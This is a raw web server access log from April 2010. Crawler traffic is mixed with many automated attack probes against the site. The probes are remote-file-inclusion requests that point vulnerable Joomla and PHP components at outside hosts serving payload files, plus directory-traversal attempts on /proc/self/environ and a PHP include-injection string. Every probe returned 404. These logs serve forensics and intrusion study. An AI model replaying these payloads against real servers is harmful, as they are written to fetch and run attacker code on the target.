87.106.132.3 - - [20/Apr/2010:23:57:34 -0500] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:23:57:34 -0500] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:23:57:47 -0500] "GET /logs/access_log.1268265600//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:23:58:28 -0500] "GET //components/com_lmo/lmo.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:23:58:28 -0500] "GET /logs//components/com_lmo/lmo.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:23:58:28 -0500] "GET /logs/access_log.1225929600//components/com_lmo/lmo.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:23:58:31 -0500] "GET /logs/access_log.1170288000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.106.132.3 - - [20/Apr/2010:23:59:17 -0500] "GET /logs/access_log.1219363200//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:00:00:39 -0500] "GET //sources/template.php?CONFIG%5Bmain_path%5D=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:00:00:40 -0500] "GET /logs/access_log.1263427200//sources/template.php?CONFIG%5Bmain_path%5D=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:00:00:40 -0500] "GET /logs/access_log.1262563200//sources/template.php?CONFIG%5Bmain_path%5D=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:00:00:40 -0500] "GET /logs//sources/template.php?CONFIG%5Bmain_path%5D=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:00:00:58 -0500] "GET //sources/template.php?CONFIG%5Bmain_path%5D=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:00:00:58 -0500] "GET /logs//sources/template.php?CONFIG%5Bmain_path%5D=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:00:00:58 -0500] "GET /logs/access_log.1262563200//sources/template.php?CONFIG%5Bmain_path%5D=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:00:00:58 -0500] "GET /logs/access_log.1263427200//sources/template.php?CONFIG%5Bmain_path%5D=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:00:01:03 -0500] "GET /logs/access_log.1200096000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.106.132.3 - - [21/Apr/2010:00:01:12 -0500] "GET //components/com_lmo/lmo.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:00:01:12 -0500] "GET /logs//components/com_lmo/lmo.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:00:01:12 -0500] "GET /logs/access_log.1225929600//components/com_lmo/lmo.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:00:02:04 -0500] "GET //sources/template.php?CONFIG%5Bmain_path%5D=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:00:02:04 -0500] "GET /logs/access_log.1263427200//sources/template.php?CONFIG%5Bmain_path%5D=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:00:02:04 -0500] "GET /logs/access_log.1262563200//sources/template.php?CONFIG%5Bmain_path%5D=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:00:02:04 -0500] "GET /logs//sources/template.php?CONFIG%5Bmain_path%5D=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.46.13.101 - - [21/Apr/2010:00:02:56 -0500] "GET /logs/access_log.1242518400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [21/Apr/2010:00:02:59 -0500] "GET /logs/access_log.1182297600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:00:04:16 -0500] "GET /logs/access_log.1195430400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.106.132.3 - - [21/Apr/2010:00:05:34 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:00:05:34 -0500] "GET /logs/access_log.1268611200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:00:05:34 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:00:05:37 -0500] "GET /logs/access_log.1219363200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:00:07:28 -0500] "GET /logs/access_log.1154908800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:00:09:23 -0500] "GET /logs/access_log.1207008000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.106.132.3 - - [21/Apr/2010:00:09:50 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:00:09:50 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:00:09:50 -0500] "GET /logs/access_log.1212969600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:00:11:17 -0500] "GET /logs/access_log.1170806400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.115.111.248 - - [21/Apr/2010:00:13:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [21/Apr/2010:00:14:27 -0500] "GET /logs/access_log.1157587200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.106.132.3 - - [21/Apr/2010:00:15:50 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:00:15:50 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:00:15:50 -0500] "GET /logs/access_log.1219708800%20%20//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
220.232.195.131 - - [21/Apr/2010:00:15:52 -0500] "GET /logs/index.php?option=com_webtv&controller=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
220.232.195.131 - - [21/Apr/2010:00:15:52 -0500] "GET /index.php?option=com_webtv&controller=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
220.232.195.131 - - [21/Apr/2010:00:15:53 -0500] "GET /logs/index.php?option=com_webtv&controller=./../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""-"
220.232.195.131 - - [21/Apr/2010:00:15:53 -0500] "GET /index.php?option=com_webtv&controller=./../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""-"
87.250.255.243 - - [21/Apr/2010:00:16:23 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.70.32.2 - - [21/Apr/2010:00:16:36 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:00:16:36 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:00:16:36 -0500] "GET /logs/access_log.1270598400%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.46.199.43 - - [21/Apr/2010:00:17:58 -0500] "GET /logs/access_log.1176768000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [21/Apr/2010:00:18:18 -0500] "GET /logs/access_log.1200009600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
173.200.47.153 - - [21/Apr/2010:00:18:28 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.ansanseo.es.kr/bbs/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
173.200.47.153 - - [21/Apr/2010:00:18:28 -0500] "GET /logs/access_log.1231027200//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.ansanseo.es.kr/bbs/id1.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
173.200.47.153 - - [21/Apr/2010:00:18:28 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.ansanseo.es.kr/bbs/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:00:20:50 -0500] "GET /logs/access_log.1198540800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:00:23:22 -0500] "GET /logs/access_log.1158883200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.232.85.247 - - [21/Apr/2010:00:25:09 -0500] "GET /logs//components/com_sef/sef_func.php?mosConfig_absolute_path=http://fcg.com.pl/www/system2/tmp/aut2.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.232.85.247 - - [21/Apr/2010:00:25:10 -0500] "GET //components/com_sef/sef_func.php?mosConfig_absolute_path=http://fcg.com.pl/www/system2/tmp/aut2.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
87.250.255.243 - - [21/Apr/2010:00:25:17 -0500] "GET /logs/access_log.1193356800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.106.132.3 - - [21/Apr/2010:00:25:53 -0500] "GET //components/com_peoplebook/languages/english.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:00:25:53 -0500] "GET /logs//components/com_peoplebook/languages/english.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:00:25:53 -0500] "GET /logs/access_log.1219708800%20%20//components/com_peoplebook/languages/english.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:00:27:49 -0500] "GET /logs/access_log.1195689600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.106.132.3 - - [21/Apr/2010:00:29:51 -0500] "GET /logs//administrator/components/com_peoplebook/class.peoplebook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:00:29:51 -0500] "GET //administrator/components/com_peoplebook/class.peoplebook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:00:29:51 -0500] "GET /logs/access_log.1219708800%20%20//administrator/components/com_peoplebook/class.peoplebook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:00:30:00 -0500] "GET /logs//administrator/components/com_peoplebook/config.peoplebook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:00:30:00 -0500] "GET /logs/access_log.1219708800%20%20//administrator/components/com_peoplebook/config.peoplebook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:00:30:00 -0500] "GET //administrator/components/com_peoplebook/config.peoplebook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:00:31:01 -0500] "GET /logs/access_log.1231545600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.133.173.34 - - [21/Apr/2010:00:33:15 -0500] "GET //write_update.php?board_skin_path=http://www.janmclucas.com.au/.data/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.831"
87.250.255.243 - - [21/Apr/2010:00:33:33 -0500] "GET /logs/access_log.1242259200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.41 - - [21/Apr/2010:00:35:56 -0500] "GET /logs/access_log.1210291200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [21/Apr/2010:00:36:44 -0500] "GET /logs/access_log.1154736000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.85 - - [21/Apr/2010:00:36:58 -0500] "GET /logs/access_log.1187222400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [21/Apr/2010:00:39:16 -0500] "GET /logs/access_log.1251936000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:00:41:10 -0500] "GET /logs/access_log.1242172800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:00:43:42 -0500] "GET /logs/access_log.1267142400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:00:46:53 -0500] "GET /logs/access_log.1195171200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:00:49:25 -0500] "GET /logs/access_log.1230854400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:00:51:19 -0500] "GET /logs/access_log.1166486400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.115.111.248 - - [21/Apr/2010:00:51:44 -0500] "GET /logs/access_log.1220572800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [21/Apr/2010:00:51:46 -0500] "GET /logs/access_log.1238198400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [21/Apr/2010:00:53:51 -0500] "GET /logs/access_log.1259539200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [21/Apr/2010:00:55:30 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [21/Apr/2010:00:55:30 -0500] "GET /logs/access_log.1206230400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [21/Apr/2010:00:55:46 -0500] "GET /logs/access_log.1186099200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.249.71.225 - - [21/Apr/2010:00:57:00 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [21/Apr/2010:00:57:00 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [21/Apr/2010:00:57:01 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.70.32.2 - - [21/Apr/2010:00:57:31 -0500] "GET /logs//galeria.php?start=0&kategoria=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:00:57:31 -0500] "GET //galeria.php?start=0&kategoria=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:00:57:31 -0500] "GET /logs/access_log.1271030400%20%20//galeria.php?start=0&kategoria=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:00:57:40 -0500] "GET /logs/access_log.1220054400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:01:00:50 -0500] "GET /logs/access_log.1246406400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.70.32.2 - - [21/Apr/2010:01:00:52 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[1]=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:00:52 -0500] "GET /skins/advanced/advanced1.php?pluginpath[1]=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:00:52 -0500] "GET /logs/access_log.1266451200/skins/advanced/advanced1.php?pluginpath[1]=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:00:57 -0500] "GET /skins/advanced/advanced1.php?pluginpath[1]=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:00:57 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[1]=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:00:57 -0500] "GET /logs/access_log.1265414400/skins/advanced/advanced1.php?pluginpath[1]=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:01:08 -0500] "GET /logs/access_log.1244592000/skins/advanced/advanced1.php?pluginpath[1]=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.175.67.66 - - [21/Apr/2010:01:01:34 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.175.67.66 - - [21/Apr/2010:01:01:34 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.67.66 - - [21/Apr/2010:01:01:34 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
69.175.67.66 - - [21/Apr/2010:01:01:38 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.175.67.66 - - [21/Apr/2010:01:01:38 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.175.67.66 - - [21/Apr/2010:01:01:38 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
69.175.67.66 - - [21/Apr/2010:01:01:39 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.175.67.66 - - [21/Apr/2010:01:01:48 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:01:03:23 -0500] "GET /logs/access_log.1227139200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:01:05:18 -0500] "GET /artwork/txt.htm HTTP/1.1" 200 3880 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.175.97.154 - - [21/Apr/2010:01:05:58 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://snoothie.com/includes/MM_XSLTransform/byz9991.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.175.97.154 - - [21/Apr/2010:01:05:58 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://snoothie.com/includes/MM_XSLTransform/byz9991.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.175.97.154 - - [21/Apr/2010:01:05:58 -0500] "GET /logs/access_log.1220054400%20%20//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://snoothie.com/includes/MM_XSLTransform/byz9991.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
66.221.63.33 - - [21/Apr/2010:01:07:11 -0500] "GET //help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 291 "-""Mozilla/5.0"
66.221.63.33 - - [21/Apr/2010:01:07:11 -0500] "GET /logs/access_log.1236297600//help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 318 "-""Mozilla/5.0"
66.221.63.33 - - [21/Apr/2010:01:07:11 -0500] "GET /logs//help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 296 "-""Mozilla/5.0"
204.232.202.236 - - [21/Apr/2010:01:07:53 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://snoothie.com/includes/MM_XSLTransform/byz9991.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
204.232.202.236 - - [21/Apr/2010:01:07:53 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://snoothie.com/includes/MM_XSLTransform/byz9991.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
204.232.202.236 - - [21/Apr/2010:01:07:53 -0500] "GET /logs/access_log.1220054400%20%20//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://snoothie.com/includes/MM_XSLTransform/byz9991.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:01:07:55 -0500] "GET /logs/access_log.1212537600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.221.63.33 - - [21/Apr/2010:01:08:14 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://snoothie.com/includes/MM_XSLTransform/byz9991.txt??? HTTP/1.0" 404 319 "-""Mozilla/5.0"
66.221.63.33 - - [21/Apr/2010:01:08:14 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://snoothie.com/includes/MM_XSLTransform/byz9991.txt??? HTTP/1.0" 404 314 "-""Mozilla/5.0"
66.221.63.33 - - [21/Apr/2010:01:08:14 -0500] "GET /logs/access_log.1220054400%20%20//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://snoothie.com/includes/MM_XSLTransform/byz9991.txt??? HTTP/1.0" 404 343 "-""Mozilla/5.0"
173.200.47.153 - - [21/Apr/2010:01:08:33 -0500] "GET /logs//help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.ansanseo.es.kr/bbs/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
173.200.47.153 - - [21/Apr/2010:01:08:33 -0500] "GET /logs/access_log.1223164800//help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.ansanseo.es.kr/bbs/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
173.200.47.153 - - [21/Apr/2010:01:08:33 -0500] "GET //help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.ansanseo.es.kr/bbs/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
173.200.47.153 - - [21/Apr/2010:01:09:45 -0500] "GET //help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.ansanseo.es.kr/bbs/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
173.200.47.153 - - [21/Apr/2010:01:09:45 -0500] "GET /logs//help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.ansanseo.es.kr/bbs/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
173.200.47.153 - - [21/Apr/2010:01:09:45 -0500] "GET /logs/access_log.1236297600//help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.ansanseo.es.kr/bbs/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:01:09:50 -0500] "GET /logs/access_log.1267056000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.244 - - [21/Apr/2010:01:10:58 -0500] "GET /logs/access_log.1183248000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.196 - - [21/Apr/2010:01:10:58 -0500] "GET /logs/access_log.1241481600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
